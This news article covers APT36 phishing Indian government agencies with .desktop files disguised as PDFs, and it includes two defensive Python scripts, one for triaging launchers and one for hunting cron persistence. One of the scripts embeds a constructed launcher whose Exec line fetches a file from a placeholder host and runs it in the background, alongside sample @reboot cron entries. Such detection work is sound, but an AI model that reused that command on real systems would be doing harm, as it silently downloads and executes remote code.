Indian Government Systems Under Attack: Hackers Deploy Fake Shortcut Files

A Pakistan-linked hacking group known as Transparent Tribe (APT36) is once again in the spotlight for launching a fresh cyberattack campaign against Indian government institutions.

Researchers at cybersecurity firm CYFIRMA have uncovered a new cyber-espionage campaign aimed at Indian government agencies, in which attackers disguise malicious Linux .desktop launcher files as harmless PDF documents in order to install malware silently in the background.

How The Attack Works

According to CYFIRMA, the campaign begins with phishing emails that appear to carry official meeting invitations, with an attachment named something like "Meeting_Ltr_ID1543ops.pdf.desktop". The file looks like a PDF, but it is a Linux .desktop launcher: a victim who opens it does not view a document but runs the commands in the launcher's Exec line, which install spyware in the background.

The launcher downloads a malware payload from attacker-controlled servers such as securestore[.]cv and modgovindia[.]space and installs it silently. To avoid suspicion, it also opens a decoy PDF hosted on Google Drive in Firefox, so the victim believes they have simply opened the meeting document.

Once inside the system, the malware, written in the Go programming language, can steal sensitive data, harvest login credentials, give the attackers long-term access, and survive reboots by setting up scheduled tasks.
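The lure works because file managers display the Name= value of a launcher rather than its real file name, so the trailing ".desktop" is hidden from the user. The following triage script, written here as an added example and not code from CYFIRMA or the article, parses a launcher and flags the traits described above: a document-style double extension, a document icon on an Application entry, a shell wrapper in Exec, a download tool, writes under a hidden dot-directory, a cloud-hosted decoy opened in a browser, and a backgrounded process. The sample launcher, its URLs and the payload path are constructed placeholders, not indicators from the report.

```python
"""Triage a .desktop launcher for the PDF-lure pattern described above."""
import re
import shlex
from configparser import ConfigParser

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
SHELLS = ("bash", "sh", "dash", "zsh")

# Constructed sample modelled on the reported lure. The URL, payload path and
# decoy link are placeholders for illustration, not indicators from the report.
SAMPLE_NAME = "Meeting_Ltr_ID1543ops.pdf.desktop"
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL https://example.invalid/payload -o ~/.config/systemd/systemd-update; chmod +x ~/.config/systemd/systemd-update; nohup ~/.config/systemd/systemd-update & firefox https://drive.google.com/file/d/example"
"""

# Constructed benign launcher for comparison (a stock PDF viewer entry).
BENIGN_NAME = "org.gnome.Evince.desktop"
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Document Viewer
Icon=org.gnome.Evince
Exec=evince %U
"""


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict, preserving key case."""
    cp = ConfigParser(interpolation=None, delimiters=("=",))  # Exec may hold % codes and ':'
    cp.optionxform = str                                      # keep "Exec", not "exec"
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        raise ValueError("no [Desktop Entry] group")
    return dict(cp["Desktop Entry"])


def triage_desktop(filename, text):
    """Return the list of heuristic findings for one launcher file."""
    entry = parse_desktop(text)
    findings = []
    stem = filename[:-len(".desktop")] if filename.endswith(".desktop") else filename
    if stem.lower().endswith(DOC_EXTS):
        findings.append("double_extension")           # foo.pdf.desktop
    if entry.get("Type") == "Application" and re.match(
            r"application-(pdf|msword|vnd\.)|x-office-", entry.get("Icon", "")):
        findings.append("document_icon_on_launcher")  # launcher borrowing a document icon
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        argv = exec_line.split()
    flat = " ".join(argv)  # includes the string handed to `bash -c`
    if argv and argv[0].rsplit("/", 1)[-1] in SHELLS and "-c" in argv[:2]:
        findings.append("shell_wrapper")
    if re.search(r"\b(curl|wget)\b", flat):
        findings.append("downloads_payload")
    if re.search(r"(?:~|\$HOME|/home/[^/\s]+)/\.[\w.-]+", flat):
        findings.append("writes_hidden_path")         # e.g. ~/.config/...
    if re.search(r"\b(firefox|xdg-open|chromium|google-chrome)\b\s+\S*drive\.google\.com", flat):
        findings.append("opens_cloud_hosted_decoy")
    if re.search(r"\b(nohup|setsid)\b|\s&(?:\s|$)", flat):
        findings.append("backgrounds_process")
    return findings


def is_suspicious(findings):
    """A document-named launcher is suspicious on its own; otherwise require two signals."""
    return "double_extension" in findings or len(findings) >= 2


if __name__ == "__main__":
    for name, text in ((SAMPLE_NAME, SAMPLE_DESKTOP), (BENIGN_NAME, BENIGN_DESKTOP)):
        f = triage_desktop(name, text)
        print(f"{name}: {'SUSPICIOUS' if is_suspicious(f) else 'ok'} {f}")
```

Run it over every *.desktop file found in mail attachment directories, Downloads folders and ~/.local/share/applications; the double-extension check alone is enough to quarantine a file, while the other signals are there so that a lure renamed to something innocuous still scores.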

“APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls,” CYFIRMA wrote in a research blog post.

Unlike earlier operations, this campaign tailors its attacks to India's Linux-based systems such as BOSS (Bharat Operating System Solutions), a government-backed operating system, in addition to Windows systems.

To maintain persistence, the malware adds a cron job that runs the hidden payload '.config/systemd/systemd-update' every time the system reboots, so it comes back after a shutdown or after the process is killed.

Since BOSS is widely used in government departments, this dual-platform targeting increases the hackers' chances of success.
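The persistence described above leaves a simple artefact in the user's crontab: an @reboot entry pointing at an executable inside a hidden dot-directory. Note that real systemd user units live under ~/.config/systemd/user/ as .service files, so an executable sitting directly in ~/.config/systemd/ is a lookalike rather than anything systemd would use. The hunt script below is an added example, not code from CYFIRMA or the article; it parses user-crontab lines (read from stdin, e.g. `crontab -l | python3 hunt.py`, or the constructed sample when run interactively) and reports jobs that match this pattern. The sample crontab, user name and paths are constructed for illustration.

```python
"""Hunt a user crontab for reboot-triggered jobs launched from hidden dot-directories."""
import re
import sys

# Constructed sample crontab (user format: schedule followed by command).
# Paths and commands are placeholders modelled on the reported behaviour.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/bin/apt-get update
@reboot /home/user/.config/systemd/systemd-update
@reboot nohup $HOME/.config/systemd/systemd-update >/dev/null 2>&1 &
*/5 * * * * /home/user/.local/share/backup.sh
"""

HIDDEN_DIR = re.compile(r"(?:/home/[^/\s]+|\$HOME|~)/\.[^/\s]+/\S+")   # ~/.something/…
SYSTEMD_LOOKALIKE = re.compile(r"/\.config/systemd/(?!user/)\S+")       # not a real unit dir
DISCARD_OUTPUT = re.compile(r">\s*/dev/null|2>&1")                      # hides errors/output
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text):
    """Yield (line_no, schedule, command) per job; skip blanks, comments and VAR=value lines."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue
        if line.startswith("@"):                     # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)              # five time fields, then the command
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield n, sched, cmd.strip()


def hunt_cron_persistence(text):
    """Return every job with at least one suspicious trait, with the reasons recorded."""
    hits = []
    for n, sched, cmd in parse_crontab(text):
        reasons = []
        if sched == "@reboot":
            reasons.append("reboot_trigger")
        if HIDDEN_DIR.search(cmd):
            reasons.append("hidden_dir_executable")
        if SYSTEMD_LOOKALIKE.search(cmd):
            reasons.append("systemd_lookalike_path")
        if DISCARD_OUTPUT.search(cmd):
            reasons.append("output_discarded")
        if reasons:
            hits.append({"line": n, "schedule": sched, "command": cmd, "reasons": reasons})
    return hits


def high_confidence(hits):
    """Reboot-triggered jobs run from a hidden directory match the reported persistence."""
    return [h for h in hits if "reboot_trigger" in h["reasons"]
            and "hidden_dir_executable" in h["reasons"]]


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CRONTAB
    hits = hunt_cron_persistence(text)
    strong = {h["line"] for h in high_confidence(hits)}
    for h in hits:
        tag = "HIGH" if h["line"] in strong else "review"
        print(f"line {h['line']} [{tag}] {h['schedule']} {h['command']}  <- {', '.join(h['reasons'])}")
```

Anything flagged HIGH deserves a look at the referenced file (hash it, check its ELF header and build info, and compare its creation time with mail-delivery logs); the lower-tier hits, such as the sample's backup script under ~/.local, are there to prompt review, not to be acted on blindly.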

Why This Matters

Security experts warn that Transparent Tribe's evolving tactics have now shifted from its traditional use of Windows malware to developing threats aimed at Linux BOSS.

"The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group's intent to diversify access vectors and ensure persistence even in hardened environments," CYFIRMA said.

Adding to the danger, the group is also running credential-harvesting sites that mimic Indian government portals. Fake login pages trick victims into handing over their email address, password, and even their Kavach two-factor authentication (2FA) code, a security measure used by Indian agencies since 2022. Because the code is a one-time value the attackers must use it promptly, but with it they bypass this security layer and gain complete access to the account.

Long-Term Threat

Transparent Tribe, believed to be operating out of Pakistan, has been active for over a decade, regularly targeting the Indian government, defense, and critical infrastructure organizations. Its tactics have steadily evolved, from simple Windows-based malware to highly tailored Linux backdoors and credential theft schemes across South Asia.

Recommendations & Mitigation

Security researchers are advising government employees to handle email attachments and login pages with caution, as disguised PDFs and fake portals are being used to trick users into giving up their credentials.

To counter APT36's campaign against Indian government entities through weaponized .desktop files, agencies are advised to deploy strong email security (including blocking or quarantining .desktop attachments), conduct regular user training, and harden BOSS Linux with least-privilege controls. Endpoint detection, network monitoring, and integration of the published IOCs and YARA rules will help with early detection, while timely patching and behavior-based controls are vital to block suspicious activity such as launchers that download and execute files or add cron jobs.

The Bigger Picture

The incident underscores the national security risks posed by APT groups targeting government infrastructure. If successful, such attacks could lead to the theft of classified data, disruptions in critical operations, and enable long-term surveillance of Indian agencies. As Transparent Tribe continues to evolve its methods, India faces a growing challenge in defending sensitive infrastructure from cyber-espionage.


Kavita Iyer